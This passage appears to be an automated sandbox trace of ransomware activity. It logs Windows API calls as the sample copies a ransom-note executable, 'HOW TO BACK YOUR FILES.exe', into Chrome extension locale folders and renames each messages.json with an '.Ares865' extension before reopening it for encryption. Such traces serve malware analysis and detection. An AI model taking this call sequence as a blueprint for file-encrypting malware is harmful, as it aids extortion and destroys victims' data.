"c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.827] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.827] GetLastError () returned 0x0 [0103.827] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.827] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f180a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f180a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.827] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.827] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.828] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.Ares865") returned 160 [0103.828] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.830] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=236) returned 1 [0103.834] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" [0103.834] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" [0103.834] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.834] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.835] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.835] GetLastError () returned 0x0 [0103.836] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f180a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f180a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.836] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.836] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.836] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.Ares865") returned 160 [0103.836] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.837] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.838] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0103.841] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" [0103.841] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" [0103.841] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.841] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.842] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.842] GetLastError () returned 0x0 [0103.842] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.842] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f180a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f180a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.843] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.843] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.843] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.Ares865") returned 160 [0103.843] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.845] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.845] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=208) returned 1 [0103.848] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" [0103.848] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" [0103.848] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.848] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.849] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.849] GetLastError () returned 0x0 [0103.850] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f180a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f180a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.850] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.850] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.850] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.Ares865") returned 160 [0103.850] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.852] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=230) returned 1 [0103.855] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" [0103.856] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" [0103.856] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.856] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.856] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.857] GetLastError () returned 0x0 [0103.857] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.857] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1a6be0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1a6be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.857] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.857] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.857] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.Ares865") returned 160 [0103.857] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.860] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=291) returned 1 [0103.866] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" [0103.866] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" [0103.866] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.866] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.866] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.867] GetLastError () returned 0x0 [0103.867] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.867] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 